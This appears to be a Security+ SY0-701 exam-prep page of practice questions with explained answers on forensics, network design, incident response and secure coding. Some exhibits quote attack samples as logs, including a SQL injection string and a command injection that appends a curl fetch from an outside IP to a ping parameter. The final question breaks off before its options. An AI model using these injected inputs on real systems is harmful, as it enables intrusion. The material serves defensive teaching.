Sample questions
Security+ SY0-701 practice questions
An HR analyst must send a salary file to an external auditor. The auditor only needs names, departments, and salary totals, not Social Security numbers or bank account details. Which two actions should the analyst take first? Select two.
Trap 1: Upload the file to a public link and send the URL by email
A public link makes the file easier to access, but it also greatly increases the chance of unauthorized disclosure.
Trap 2: Rename the file to a less obvious name and send it normally
Renaming the file does not protect the contents, so sensitive data is still exposed during transmission and storage.
Trap 3: Save the file locally on a USB drive and hand-deliver it
Physical delivery may seem controlled, but it adds handling risk and does not remove unneeded sensitive data from the file.
- A
Remove unnecessary sensitive fields before sharing
Data minimization reduces exposure by ensuring the auditor receives only the information needed for the stated business purpose.
- B
Use an approved encrypted transfer method
Encryption protects the file while it is being sent, which reduces the chance that an unauthorized party can read it.
- C
Upload the file to a public link and send the URL by email
Why wrong: A public link makes the file easier to access, but it also greatly increases the chance of unauthorized disclosure.
- D
Rename the file to a less obvious name and send it normally
Why wrong: Renaming the file does not protect the contents, so sensitive data is still exposed during transmission and storage.
- E
Save the file locally on a USB drive and hand-deliver it
Why wrong: Physical delivery may seem controlled, but it adds handling risk and does not remove unneeded sensitive data from the file.
An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?
Trap 1: Mount the drive read-write so the investigator can browse it…
Read-write mounting risks modifying metadata, timestamps, or file system structures. That weakens the ability to prove the original drive was not altered.
Trap 2: Copy only the user profile folders with a file manager to save time.
A file copy omits slack space, deleted data, and other artifacts that may be crucial in a forensic investigation. It also provides weaker integrity assurance than a complete forensic image.
Trap 3: Boot the laptop normally and use backup software to duplicate the…
Booting the system changes the evidence state, and backup software is not the same as forensic acquisition. The goal here is preservation, not convenience.
- A
Mount the drive read-write so the investigator can browse it quickly.
Why wrong: Read-write mounting risks modifying metadata, timestamps, or file system structures. That weakens the ability to prove the original drive was not altered.
- B
Use a hardware write blocker and create a bit-by-bit forensic image with hashes.
This is the best practice because a hardware write blocker prevents any accidental writes to the source drive, and a bit-by-bit image captures the exact data structure for analysis. Hashing the source or image before and after acquisition provides integrity verification, which is essential when evidence may be challenged later. Together, these steps protect the original media and support chain of custody and courtroom admissibility.
- C
Copy only the user profile folders with a file manager to save time.
Why wrong: A file copy omits slack space, deleted data, and other artifacts that may be crucial in a forensic investigation. It also provides weaker integrity assurance than a complete forensic image.
- D
Boot the laptop normally and use backup software to duplicate the disk.
Why wrong: Booting the system changes the evidence state, and backup software is not the same as forensic acquisition. The goal here is preservation, not convenience.
An investigator must collect data from a suspected insider-threat laptop so the evidence could be used in an HR and legal review. Which action best preserves admissibility?
Trap 1: Boot the laptop normally and browse the user's files for clues
Booting the system normally can change timestamps, modify files, and alter evidence in ways that weaken chain of custody.
Trap 2: Copy the user's documents to a USB drive and continue the…
A simple file copy is not a forensic acquisition method and can miss metadata, deleted artifacts, and other important evidence.
Trap 3: Take screenshots of the desktop and delete the original drive…
Screenshots are only partial evidence, and deleting the original drive would destroy the source material needed for forensic validation.
- A
Boot the laptop normally and browse the user's files for clues
Why wrong: Booting the system normally can change timestamps, modify files, and alter evidence in ways that weaken chain of custody.
- B
Create a forensic image through a write blocker and record hashes before and after acquisition
This is the correct preservation method because it avoids altering the original disk and creates verifiable integrity checks. Using a write blocker prevents writes to the source media, and hashes document that the image matches the evidence. Detailed chain-of-custody records then support admissibility in HR, disciplinary, or legal proceedings.
- C
Copy the user's documents to a USB drive and continue the investigation later
Why wrong: A simple file copy is not a forensic acquisition method and can miss metadata, deleted artifacts, and other important evidence.
- D
Take screenshots of the desktop and delete the original drive contents afterward
Why wrong: Screenshots are only partial evidence, and deleting the original drive would destroy the source material needed for forensic validation.
An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?
Trap 1: This is normal DNS behavior, so no action is needed unless users…
The repeated, structured pattern and random-looking subdomains are not typical of normal business DNS activity. Ignoring it could allow continued compromise.
Trap 2: Rotate the DNS server’s administrator password and leave the web…
Changing a DNS admin password does not address suspicious outbound traffic from the web server itself. The issue is likely on the endpoint or network path.
Trap 3: Assume the web server is performing routine certificate renewal…
Certificate renewal traffic does not usually produce random-looking subdomains at a fixed interval to an unknown domain. That explanation does not fit the pattern well.
- A
This is normal DNS behavior, so no action is needed unless users report an outage.
Why wrong: The repeated, structured pattern and random-looking subdomains are not typical of normal business DNS activity. Ignoring it could allow continued compromise.
- B
Suspect DNS-based command-and-control, then isolate the server and collect logs and packet data for analysis.
Regular outbound DNS queries to random subdomains can indicate tunneling or command-and-control traffic. The fact that it repeats at a fixed interval strengthens that suspicion. The best next step is to contain the host so the activity cannot continue, while preserving logs and packet captures for investigation. This lets the team determine whether malware, a rogue process, or a misconfiguration is responsible without losing evidence.
- C
Rotate the DNS server’s administrator password and leave the web server online.
Why wrong: Changing a DNS admin password does not address suspicious outbound traffic from the web server itself. The issue is likely on the endpoint or network path.
- D
Assume the web server is performing routine certificate renewal checks and ignore the alert.
Why wrong: Certificate renewal traffic does not usually produce random-looking subdomains at a fixed interval to an unknown domain. That explanation does not fit the pattern well.
An investigator needs to make a forensic image of a suspect laptop without changing the original drive contents. Which two practices should be used? Select two.
Trap 1: Mount the drive read/write so hidden files are easier to access
Read/write mounting can alter evidence and defeats the purpose of forensic acquisition.
Trap 2: Defragment the drive first to improve imaging speed
Defragmentation changes the evidence and is inappropriate before imaging.
Trap 3: Install triage tools directly on the suspect laptop
Installing tools on the suspect system modifies it and can contaminate evidence.
- A
Use a hardware or software write blocker during acquisition
A write blocker prevents the acquisition tool from modifying the source drive.
- B
Record SHA-256 hashes of the source and the image to verify integrity
Matching hashes help prove that the forensic copy is identical to the original evidence.
- C
Mount the drive read/write so hidden files are easier to access
Why wrong: Read/write mounting can alter evidence and defeats the purpose of forensic acquisition.
- D
Defragment the drive first to improve imaging speed
Why wrong: Defragmentation changes the evidence and is inappropriate before imaging.
- E
Install triage tools directly on the suspect laptop
Why wrong: Installing tools on the suspect system modifies it and can contaminate evidence.
An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.
Trap 1: Let all corporate laptops connect directly to SSH on the servers if…
MFA is useful, but direct access from every corporate laptop still expands the attack surface and makes lateral movement much easier after an endpoint compromise. The scenario explicitly asks to stop direct management access and reduce spread, so a central jump path is better than broad direct reachability.
Trap 2: Expose SSH to the internet because key-based authentication is…
Publicly exposing SSH is unnecessary and increases brute-force, scanning, and exploitation risk. Key-based authentication helps, but it does not justify direct internet access to management services. The requirement is to remove direct access from employee laptops, not extend management services to untrusted networks.
Trap 3: Use split tunneling for admin traffic so management packets can…
Split tunneling is generally used to route some traffic outside the secure tunnel, which is the opposite of what this scenario needs. Management traffic should be tightly controlled and inspected, not routed around security controls. Bypassing the VPN would weaken the protected management path.
- A
Require administrators to connect to a bastion host or jump server before reaching the Linux servers.
A bastion host is a hardened choke point for privileged access, so all administrative sessions can be concentrated, filtered, and monitored. It prevents direct SSH exposure from general user systems and gives the security team a single place to enforce logging and session control. This is a common hardened management-path pattern.
- B
Let all corporate laptops connect directly to SSH on the servers if MFA is enabled.
Why wrong: MFA is useful, but direct access from every corporate laptop still expands the attack surface and makes lateral movement much easier after an endpoint compromise. The scenario explicitly asks to stop direct management access and reduce spread, so a central jump path is better than broad direct reachability.
- C
Restrict management interfaces so only the bastion host can reach them and log each session.
Limiting server management interfaces to the bastion host creates a strong network boundary and prevents administrators from bypassing the controlled access path. Session logging provides traceability and supports investigations and accountability. This complements the bastion by ensuring the network architecture enforces the same control model.
- D
Expose SSH to the internet because key-based authentication is already strong.
Why wrong: Publicly exposing SSH is unnecessary and increases brute-force, scanning, and exploitation risk. Key-based authentication helps, but it does not justify direct internet access to management services. The requirement is to remove direct access from employee laptops, not extend management services to untrusted networks.
- E
Use split tunneling for admin traffic so management packets can bypass the VPN.
Why wrong: Split tunneling is generally used to route some traffic outside the secure tunnel, which is the opposite of what this scenario needs. Management traffic should be tightly controlled and inspected, not routed around security controls. Bypassing the VPN would weaken the protected management path.
An investigator needs a copy of a suspect laptop drive for analysis without changing the original media. What should be used?
Trap 1: A simple file copy of the user folder
A file copy does not preserve all metadata, deleted data, or disk structures needed for forensics.
Trap 2: A compressed archive of the desktop contents
A compressed archive captures only selected files, not the complete disk state or deleted data.
Trap 3: The original drive mounted normally on the investigator machine
Mounting the original drive normally can alter data and weaken forensic integrity.
- A
A simple file copy of the user folder
Why wrong: A file copy does not preserve all metadata, deleted data, or disk structures needed for forensics.
- B
A full forensic image taken with a write blocker
This is the best answer because a forensic image creates a bit-for-bit copy of the drive while a write blocker prevents accidental changes to the original media. That combination preserves evidentiary integrity and allows the investigator to analyze the copy safely. It is the standard approach when the original disk may later be needed in court or for formal review.
- C
A compressed archive of the desktop contents
Why wrong: A compressed archive captures only selected files, not the complete disk state or deleted data.
- D
The original drive mounted normally on the investigator machine
Why wrong: Mounting the original drive normally can alter data and weaken forensic integrity.
An organization is redesigning its office network. Guest Wi-Fi must reach the internet only, employee laptops need access to internal apps, and a payment-processing system must be separated from general user traffic but still reach one database server. Which design best meets these requirements?
Trap 1: Place all devices on one flat network and rely on host firewalls…
A flat network can work temporarily, but it expands the blast radius and weakens isolation.
Trap 2: Put the payment system in a DMZ and allow direct internet access…
A DMZ is for exposed services, not for systems that should remain internal and restricted.
Trap 3: Use NAT on every endpoint so internal devices cannot be…
NAT hides addresses, but it does not provide meaningful segmentation or access control.
- A
Place all devices on one flat network and rely on host firewalls for isolation.
Why wrong: A flat network can work temporarily, but it expands the blast radius and weakens isolation.
- B
Create separate VLANs or subnets for guest, user, and payment zones, then filter inter-zone traffic with firewalls or ACLs.
Separate zones with internal filtering limit lateral movement and allow only required flows.
- C
Put the payment system in a DMZ and allow direct internet access for database synchronization.
Why wrong: A DMZ is for exposed services, not for systems that should remain internal and restricted.
- D
Use NAT on every endpoint so internal devices cannot be individually identified on the network.
Why wrong: NAT hides addresses, but it does not provide meaningful segmentation or access control.
An online retailer is redesigning its public web application so the web server can receive internet traffic, the application server can only be reached by the web tier, and the database server can only be reached by the application tier. Which placement best supports this design?
Trap 1: Place all three servers on the same private subnet and control…
A shared subnet does not enforce tier separation. Strong passwords protect accounts, but they do not prevent a compromised web server from directly reaching the database server on the same network.
Trap 2: Put the database in the public zone so the web tier can query it…
Databases should not be internet-facing in this architecture. Exposing the database directly would greatly increase risk and bypass the intended layered protection between the tiers.
Trap 3: Use a single reverse proxy for all three servers and disable…
A reverse proxy can help front-end traffic, but it does not replace network segmentation. Disabling segmentation removes the protective boundaries that prevent unnecessary lateral movement between tiers.
- A
Place all three servers on the same private subnet and control access only with strong passwords.
Why wrong: A shared subnet does not enforce tier separation. Strong passwords protect accounts, but they do not prevent a compromised web server from directly reaching the database server on the same network.
- B
Put the web server in a public zone, the application server in a private zone, and the database server in an isolated internal zone.
This tiered placement supports a classic defense-in-depth design. The web server is internet-facing, the application tier is not directly exposed, and the database is placed in the most restricted zone. Network rules then allow only the necessary north-south and east-west traffic between tiers.
- C
Put the database in the public zone so the web tier can query it directly from the internet.
Why wrong: Databases should not be internet-facing in this architecture. Exposing the database directly would greatly increase risk and bypass the intended layered protection between the tiers.
- D
Use a single reverse proxy for all three servers and disable network segmentation to simplify management.
Why wrong: A reverse proxy can help front-end traffic, but it does not replace network segmentation. Disabling segmentation removes the protective boundaries that prevent unnecessary lateral movement between tiers.
An order-entry application must survive a single server failure and continue serving users if the primary site becomes unavailable. Management wants automatic failover, but does not want to pay for fully active production capacity in two regions. Which design is best?
Trap 1: Run one server and keep nightly backups in cloud object storage.
Backups help recovery after loss, but they do not provide automatic service continuity during an outage.
Trap 2: Deploy active-active multi-region capacity with identical…
Active-active meets the availability goal, but it usually costs more than the scenario allows and duplicates production capacity.
Trap 3: Add RAID 1 and a spare power supply to the database server.
These hardware controls improve a single server’s reliability, but they do not address a site outage or application-level failover.
- A
Run one server and keep nightly backups in cloud object storage.
Why wrong: Backups help recovery after loss, but they do not provide automatic service continuity during an outage.
- B
Use two servers in one site behind a load balancer and maintain an asynchronously replicated warm standby site.
This provides local redundancy for server failure and a lower-cost secondary site for failover if the primary site is lost.
- C
Deploy active-active multi-region capacity with identical production load in both regions.
Why wrong: Active-active meets the availability goal, but it usually costs more than the scenario allows and duplicates production capacity.
- D
Add RAID 1 and a spare power supply to the database server.
Why wrong: These hardware controls improve a single server’s reliability, but they do not address a site outage or application-level failover.
Based on the exhibit, what is the best handling decision for the requested file?
Exhibit
Data request: File: customer_export.csv Contents: full name, street address, SSN last 4, account balance, support notes Requestor: external troubleshooting contractor Policy excerpt: - Internal: company staff only - Confidential: encrypt in transit, approved recipients only - Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing - Public: may be shared externally without restriction
Trap 1: Share the full file by email as Confidential because only the last…
Last-four SSN data is still sensitive, and the file also contains address, balance, and support notes that require stronger handling.
Trap 2: Label it Public because the contractor needs the information to…
Business convenience does not change the classification of customer data containing personally identifiable and financial details.
Trap 3: Mark it Internal and place it on the shared project drive for easy…
Internal sharing is too broad for customer records and does not satisfy the minimization and approval requirements shown in the policy.
- A
Share the full file by email as Confidential because only the last four digits of the SSN are included.
Why wrong: Last-four SSN data is still sensitive, and the file also contains address, balance, and support notes that require stronger handling.
- B
Label it Public because the contractor needs the information to troubleshoot effectively.
Why wrong: Business convenience does not change the classification of customer data containing personally identifiable and financial details.
- C
Mark it Internal and place it on the shared project drive for easy access.
Why wrong: Internal sharing is too broad for customer records and does not satisfy the minimization and approval requirements shown in the policy.
- D
Treat it as Restricted, redact unnecessary fields, and provide only the minimum approved dataset through a logged encrypted transfer.
The file contains customer PII, financial information, and case notes, so it should be handled as Restricted rather than merely Confidential. The policy requires minimization, masking where possible, owner approval, time-limited access, and logged sharing. Because the request comes from an external contractor, the organization should provide only the least amount of data needed, with encryption and formal approval.
An organization is evaluating a payroll SaaS provider after the procurement team asks for evidence that the vendor's security controls were designed and operating effectively during the past year. Which document should the security team review first?
Trap 1: Memorandum of understanding
An MOU shows an agreement to collaborate, but it does not provide assurance that security controls were operating effectively.
Trap 2: Software license agreement
A license agreement governs usage rights for the software, not the effectiveness of the vendor's security controls.
Trap 3: Network diagram of the vendor's data center
A network diagram may help with architecture review, but it does not provide assurance evidence about control performance.
- A
Memorandum of understanding
Why wrong: An MOU shows an agreement to collaborate, but it does not provide assurance that security controls were operating effectively.
- B
SOC 2 Type II report
A SOC 2 Type II report provides an independent assessment of control design and operating effectiveness over a defined period.
- C
Software license agreement
Why wrong: A license agreement governs usage rights for the software, not the effectiveness of the vendor's security controls.
- D
Network diagram of the vendor's data center
Why wrong: A network diagram may help with architecture review, but it does not provide assurance evidence about control performance.
Based on the exhibit, what additional control is the best fit?
Current controls on the finance share: - SMB signing enabled - Weekly access review - Nightly backups to immutable storage - Antivirus scans at 02:00
Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive. Goal: detect unauthorized bulk access quickly before exfiltration completes.
Exhibit
Current controls on the finance share: - SMB signing enabled - Weekly access review - Nightly backups to immutable storage - Antivirus scans at 02:00 Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive. Goal: detect unauthorized bulk access quickly before exfiltration completes.
Trap 1: Increase the backup schedule from nightly to hourly.
More backups help recovery, but they do not detect suspicious file access or exfiltration in real time.
Trap 2: Rename the share to a less obvious name.
Security by obscurity does not detect misuse and does not stop a valid account from accessing files.
Trap 3: Disable SMB signing so the file transfer runs faster.
Disabling signing weakens integrity protections and does not address the core detection gap.
- A
Add file access auditing with alert thresholds forwarded to the SIEM.
Auditing is a detective control that can identify abnormal bulk reads quickly and trigger timely response.
- B
Increase the backup schedule from nightly to hourly.
Why wrong: More backups help recovery, but they do not detect suspicious file access or exfiltration in real time.
- C
Rename the share to a less obvious name.
Why wrong: Security by obscurity does not detect misuse and does not stop a valid account from accessing files.
- D
Disable SMB signing so the file transfer runs faster.
Why wrong: Disabling signing weakens integrity protections and does not address the core detection gap.
Based on the exhibit, what is the best next control to prevent noncompliant mobile devices from accessing corporate email while still allowing IT to wipe company data from lost phones?
Exhibit
MDM dashboard excerpt: - iOS device compliance: 84% - Android device compliance: 79% - Email app access policy: Allow if credentials are valid - Noncompliance reasons: outdated OS, no passcode, jailbreak/root indicators - Lost device action: Full factory reset only Security request: Block risky devices from email access and protect employee personal data on BYOD devices.
Trap 1: Require users to set a longer password on the email app and keep…
A stronger password helps only if the device itself is trustworthy. It does not block rooted, jailbroken, or outdated devices from connecting to the mailbox.
Trap 2: Disable email on all mobile devices and force users to use desktop…
This would be unnecessarily disruptive and does not address the actual security gap in a balanced way. The business requirement still needs mobile access with stronger control.
Trap 3: Rely on a remote full factory reset whenever a device is lost or…
A full wipe can erase personal data and creates privacy concerns for BYOD. It also does not stop risky devices from connecting before a loss event occurs.
- A
Enforce conditional access so only compliant MDM-enrolled devices can reach email and enable selective wipe for corporate data.
Conditional access stops noncompliant or compromised devices from using corporate email even if they have valid credentials. Selective wipe is especially important for BYOD because it removes work data without erasing personal content. Together, these controls support both access control and privacy, which is the correct architectural balance for the scenario.
- B
Require users to set a longer password on the email app and keep the current access policy.
Why wrong: A stronger password helps only if the device itself is trustworthy. It does not block rooted, jailbroken, or outdated devices from connecting to the mailbox.
- C
Disable email on all mobile devices and force users to use desktop computers only.
Why wrong: This would be unnecessarily disruptive and does not address the actual security gap in a balanced way. The business requirement still needs mobile access with stronger control.
- D
Rely on a remote full factory reset whenever a device is lost or reported stolen.
Why wrong: A full wipe can erase personal data and creates privacy concerns for BYOD. It also does not stop risky devices from connecting before a loss event occurs.
Based on the exhibit, what is the best response to the facilities manager's request?
Exhibit
Corporate privacy notice excerpt: - Employee home addresses, personal phone numbers, and emergency contacts are collected for payroll, benefits, tax reporting, and emergency notification only. - Access is limited to HR and Payroll unless a privacy review approves another purpose. Ticket: - Facilities manager requests an export of all employee home addresses and personal phone numbers to mail holiday gifts and parking passes.
Trap 1: Provide the export because the requester is a manager with a…
Being a manager does not automatically authorize access to personal data. The exhibit limits use to specific purposes, and this request falls outside them.
Trap 2: Send the data to the manager if the manager promises not to share…
A verbal promise does not override the stated purpose limitation or the access restriction in the privacy notice. Personal data handling must follow approved business use, not informal assurances.
Trap 3: Store the export in a shared drive so multiple teams can use it for…
Broader storage would increase exposure and violate the limited-access principle in the exhibit. Convenience is not a valid reason to expand access to personal data.
- A
Provide the export because the requester is a manager with a legitimate business relationship to employees.
Why wrong: Being a manager does not automatically authorize access to personal data. The exhibit limits use to specific purposes, and this request falls outside them.
- B
Deny the request and direct the manager to use an approved work-contact list or seek privacy review.
The privacy notice clearly limits home addresses and personal phone numbers to defined HR and payroll purposes. The facilities request exceeds that purpose, so the correct action is to deny the export unless a formal privacy review approves another use. Where possible, use a work-contact list that contains less sensitive information.
- C
Send the data to the manager if the manager promises not to share it externally.
Why wrong: A verbal promise does not override the stated purpose limitation or the access restriction in the privacy notice. Personal data handling must follow approved business use, not informal assurances.
- D
Store the export in a shared drive so multiple teams can use it for convenience.
Why wrong: Broader storage would increase exposure and violate the limited-access principle in the exhibit. Convenience is not a valid reason to expand access to personal data.
Before applying a major patch to a virtual machine, the administrator wants a quick way to return the VM to its exact pre-change state if the patch fails. What should the administrator create?
Trap 1: A full backup to removable media
A backup is useful for recovery, but it is slower than a snapshot for rapid rollback.
Trap 2: A separate VLAN for the virtual machine
A VLAN helps network segmentation, but it does not preserve the VM's system state.
Trap 3: A digital certificate for the patch server
Certificates help trust and authentication, but they do not provide restore points for a VM.
- A
A full backup to removable media
Why wrong: A backup is useful for recovery, but it is slower than a snapshot for rapid rollback.
- B
A snapshot of the virtual machine
A snapshot captures the VM state at a specific moment, making rollback fast after a failed patch.
- C
A separate VLAN for the virtual machine
Why wrong: A VLAN helps network segmentation, but it does not preserve the VM's system state.
- D
A digital certificate for the patch server
Why wrong: Certificates help trust and authentication, but they do not provide restore points for a VM.
Based on the exhibit, what is the best immediate action for the SOC or IR team?
A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.
Exhibit
Host: finance-lap07 10:22:11 winword.exe spawned powershell.exe -enc <redacted> 10:22:14 powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe 10:24:02 file rename activity: 184 files changed to *.locked 10:24:09 outbound SMB connections to 10.20.4.18 and 10.20.4.19 10:25:01 EDR status: endpoint still connected to corporate VPN User report: 'My shared files stopped opening and the folder names changed.'
Trap 1: Restore the workstation from backup immediately before preserving…
Immediate restoration could destroy forensic evidence and does not stop the attacker from continuing lateral movement elsewhere.
Trap 2: Run a vulnerability scan against the subnet to see whether the…
That may help later in root cause analysis, but it is not the priority while the compromise is still active.
Trap 3: Notify users to ignore the issue until the next maintenance window…
The logs show ongoing malicious activity, so waiting would increase business impact and spread risk significantly.
- A
Isolate the host from the network and revoke its remote access to stop further spread.
The workstation shows active compromise with file encryption behavior and outbound lateral movement. Immediate containment should stop additional SMB propagation and protect neighboring systems before deeper analysis begins.
- B
Restore the workstation from backup immediately before preserving any evidence.
Why wrong: Immediate restoration could destroy forensic evidence and does not stop the attacker from continuing lateral movement elsewhere.
- C
Run a vulnerability scan against the subnet to see whether the malware exploited an unpatched service.
Why wrong: That may help later in root cause analysis, but it is not the priority while the compromise is still active.
- D
Notify users to ignore the issue until the next maintenance window because the incident is likely self-limiting.
Why wrong: The logs show ongoing malicious activity, so waiting would increase business impact and spread risk significantly.
Based on the exhibit, what type of web attack is most likely taking place?
Exhibit
Web application log excerpt: Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1 Response: 500 Internal Server Error Database log: syntax error near "OR" at line 1 Developer note: the search feature appends user input directly into the SQL query string without parameterization.
Trap 1: Cross-site scripting, because the input is visible in the URL and…
Cross-site scripting would involve injecting script content that runs in a browser context. The exhibit shows database syntax errors tied to SQL query construction, not script execution in the client.
Trap 2: Broken authentication, because the application returns a 500 error.
Broken authentication involves weaknesses in login, session handling, or credential verification. A server error after crafted search input does not indicate authentication failure, so this is not the best fit.
Trap 3: Insecure deserialization, because the application is parsing…
Insecure deserialization usually involves tampered serialized objects leading to code execution or logic abuse. The log here shows direct SQL syntax manipulation, which is a different attack pattern.
- A
Cross-site scripting, because the input is visible in the URL and causes an error.
Why wrong: Cross-site scripting would involve injecting script content that runs in a browser context. The exhibit shows database syntax errors tied to SQL query construction, not script execution in the client.
- B
SQL injection, because the attacker is manipulating the database query with crafted input.
This is SQL injection because the input includes SQL control characters and logic that alter the intended query. The database error and the developer note about string concatenation confirm that user-supplied data is being inserted directly into SQL without parameterization. That makes the application vulnerable to query manipulation.
- C
Broken authentication, because the application returns a 500 error.
Why wrong: Broken authentication involves weaknesses in login, session handling, or credential verification. A server error after crafted search input does not indicate authentication failure, so this is not the best fit.
- D
Insecure deserialization, because the application is parsing attacker-controlled data.
Why wrong: Insecure deserialization usually involves tampered serialized objects leading to code execution or logic abuse. The log here shows direct SQL syntax manipulation, which is a different attack pattern.
During a disaster recovery test, what is the most important thing to confirm about the backup?
Trap 1: That the backup files exist in storage.
File existence alone does not prove the backup can be used to restore business operations. A backup must also be restorable and usable.
Trap 2: That the backup system uses encryption.
Encryption is important for protection, but it does not prove the backup will restore correctly during an outage. Recoverability is the key test here.
Trap 3: That the backup is stored on tape instead of disk.
The storage medium is not the main concern in a restore test. What matters is whether the backup can be successfully recovered and used.
- A
That the backup files exist in storage.
Why wrong: File existence alone does not prove the backup can be used to restore business operations. A backup must also be restorable and usable.
- B
That the data can be restored and is usable after recovery.
The real purpose of a backup is successful recovery. During testing, the team should verify that the data restores correctly and that applications or users can actually use it afterward. This confirms the backup supports business continuity and is not merely sitting in storage as an unreadable copy.
- C
That the backup system uses encryption.
Why wrong: Encryption is important for protection, but it does not prove the backup will restore correctly during an outage. Recoverability is the key test here.
- D
That the backup is stored on tape instead of disk.
Why wrong: The storage medium is not the main concern in a restore test. What matters is whether the backup can be successfully recovered and used.
Based on the exhibit, what wireless threat is most likely occurring?
Exhibit
Wireless scan from the lobby: SSID: CorpWiFi BSSID: 18:AA:10:22:44:60 Signal: -78 dBm SSID: CorpWiFi BSSID: 7C:22:90:11:33:AA Signal: -41 dBm SSID: CorpGuest BSSID: 18:AA:10:22:44:61 Signal: -79 dBm User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."
Trap 1: Bluetooth pairing abuse
Bluetooth pairing abuse involves short-range device pairing, not duplicate Wi-Fi SSIDs and captive portals.
Trap 2: NFC skimming
NFC skimming targets very close-range contactless communication, such as badges or payment cards. The exhibit is about wireless network access.
Trap 3: DNS poisoning
DNS poisoning manipulates name resolution. The evidence here is a fake wireless access point, not a changed DNS record.
- A
Evil twin access point
Two access points are broadcasting the same SSID, but one has a much stronger signal and triggers a suspicious captive portal. That pattern fits an evil twin access point, which imitates a legitimate network to lure users into connecting. The attacker can then intercept traffic or harvest credentials.
- B
Bluetooth pairing abuse
Why wrong: Bluetooth pairing abuse involves short-range device pairing, not duplicate Wi-Fi SSIDs and captive portals.
- C
NFC skimming
Why wrong: NFC skimming targets very close-range contactless communication, such as badges or payment cards. The exhibit is about wireless network access.
- D
DNS poisoning
Why wrong: DNS poisoning manipulates name resolution. The evidence here is a fake wireless access point, not a changed DNS record.
Based on the exhibit, which integration best lets the SaaS application trust the company's existing identity provider so users can sign in with their corporate credentials?
Exhibit
SaaS sign-in settings: - Local accounts: Enabled - SAML SSO: Disabled - SCIM provisioning: Disabled - Password synchronization: Disabled Requirement: users from the acquired subsidiary must use their existing corporate identities without separate SaaS passwords.
Trap 1: Enable password synchronization so the SaaS app stores the same…
Password synchronization still leaves the SaaS app managing credentials instead of trusting the external identity provider.
Trap 2: Create a shared local administrator account for all subsidiary…
A shared account breaks accountability and does not provide individual user authentication or centralized trust.
Trap 3: Configure MAC address filtering on company laptops to allow portal…
MAC filtering controls device access, not user authentication, and it cannot provide federated sign-in.
- A
Establish SAML federation so the SaaS app trusts the corporate identity provider.
Federation lets the SaaS app accept authentication assertions from the trusted identity provider, eliminating separate passwords.
- B
Enable password synchronization so the SaaS app stores the same password as the directory.
Why wrong: Password synchronization still leaves the SaaS app managing credentials instead of trusting the external identity provider.
- C
Create a shared local administrator account for all subsidiary users.
Why wrong: A shared account breaks accountability and does not provide individual user authentication or centralized trust.
- D
Configure MAC address filtering on company laptops to allow portal access.
Why wrong: MAC filtering controls device access, not user authentication, and it cannot provide federated sign-in.
Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?
Exhibit
EDR Alert Summary Host: FIN-LT-22 Severity: High Detection: Suspicious PowerShell with encoded command Parent Process: winword.exe Network Activity: outbound connection to 203.0.113.77:4444 User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'
Trap 1: Run a full antivirus scan first and wait for the results before…
A scan is useful later, but it does not immediately stop possible spread or attacker activity.
Trap 2: Reboot the laptop to clear the malicious process from memory.
Rebooting can destroy volatile evidence and may not stop persistence mechanisms from reloading afterward.
Trap 3: Reset the user's password and close the ticket after confirming…
Changing a password may help if credentials were stolen, but it does not stop the endpoint infection.
- A
Run a full antivirus scan first and wait for the results before taking any other action.
Why wrong: A scan is useful later, but it does not immediately stop possible spread or attacker activity.
- B
Isolate FIN-LT-22 from the network to contain the suspected malware activity.
Network isolation is the best immediate containment step when an endpoint shows signs of active malicious behavior. It limits further command-and-control traffic, prevents lateral movement, and buys time for investigation. In incident response, containment comes before eradication and recovery when the threat is still active.
- C
Reboot the laptop to clear the malicious process from memory.
Why wrong: Rebooting can destroy volatile evidence and may not stop persistence mechanisms from reloading afterward.
- D
Reset the user's password and close the ticket after confirming they can log in again.
Why wrong: Changing a password may help if credentials were stolen, but it does not stop the endpoint infection.
Based on the exhibit, which change would most improve the security of the stored password data?
Exhibit
Database sample users.password_hash -------------------------------- alex 5f4dcc3b5aa765d61d8327deb882cf99 mira 202cb962ac59075b964b07152d234b70 sam 098f6bcd4621d373cade4e832627b4f6 Developer note: - Passwords are hashed before storage - The application does not currently store any salt values
Trap 1: Store the passwords in encrypted form so they can be recovered…
Encryption is reversible, which is not ideal for password storage. If the key is exposed, passwords can be recovered.
Trap 2: Replace the hash with a plain SHA-256 digest because it is modern…
A fast general-purpose hash without salt is still vulnerable to offline guessing and precomputed attacks. It is not enough for password storage.
Trap 3: Append the application name to each password before hashing to make…
A fixed application string is not a unique per-user salt. It does not meaningfully prevent identical hashes for identical passwords within the same system.
- A
Store the passwords in encrypted form so they can be recovered later if needed.
Why wrong: Encryption is reversible, which is not ideal for password storage. If the key is exposed, passwords can be recovered.
- B
Add a unique salt per password and use a slow password hashing algorithm.
A unique salt defeats precomputed rainbow tables and ensures identical passwords do not produce identical stored values. Using a slow, purpose-built password hashing algorithm also increases the cost of offline cracking attempts.
- C
Replace the hash with a plain SHA-256 digest because it is modern and widely supported.
Why wrong: A fast general-purpose hash without salt is still vulnerable to offline guessing and precomputed attacks. It is not enough for password storage.
- D
Append the application name to each password before hashing to make the hashes unique.
Why wrong: A fixed application string is not a unique per-user salt. It does not meaningfully prevent identical hashes for identical passwords within the same system.
Based on the exhibit, what is the BEST remediation for the application flaw shown?
A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.
Exhibit
Application log excerpt: 15:08:02 POST /tools/pingHost host=10.0.0.15 15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15" 15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s 15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s" 15:09:12 Outbound HTTPS session established to 198.51.100.55
